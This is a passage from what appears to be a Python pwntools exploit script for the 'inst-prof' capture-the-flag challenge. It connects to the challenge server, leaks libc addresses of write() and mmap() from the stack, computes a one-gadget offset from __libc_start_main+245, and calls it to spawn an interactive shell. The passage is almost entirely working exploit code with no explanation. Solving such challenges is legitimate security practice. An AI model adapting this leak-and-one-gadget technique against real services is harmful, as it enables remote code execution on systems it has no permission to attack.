    # leak write() address
    set_reg('r15', 0x18)
    execute('add r14, r15')
    execute('mov r13, [r14]')
    write_addr = get_reg('r13')
    print 'write_addr', hex(write_addr)

    # leak mmap() address
    set_reg('r15', 0x20-0x18)
    execute('add r14, r15')
    execute('mov r13, [r14]')
    mmap_addr = get_reg('r13')
    print 'mmap_addr', hex(mmap_addr)

def main():
    global conn
    conn = remote('inst-prof.ctfcompetition.com', 1337)
    conn.recvuntil('initializing prof...ready\n')

    # find the address of __libc_start_main+245
    set_reg('r15', 0x40)
    execute('mov r14, [rsp+r15]')

    # calculate the address of the chosen one-gadget and jump to it
    libc_start_main_245_offset = 0x21f45
    onegadget_offset = 0xe8fd5
    set_reg('r15', -libc_start_main_245_offset + onegadget_offset)
    execute('add r14, r15')
    execute('call r14', recv=False)

    conn.interactive()


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-l', '--leak', action='store_true')
    args = parser.parse_args()

    if args.leak:
        leak_write_mmap_addr()
    else:
        main()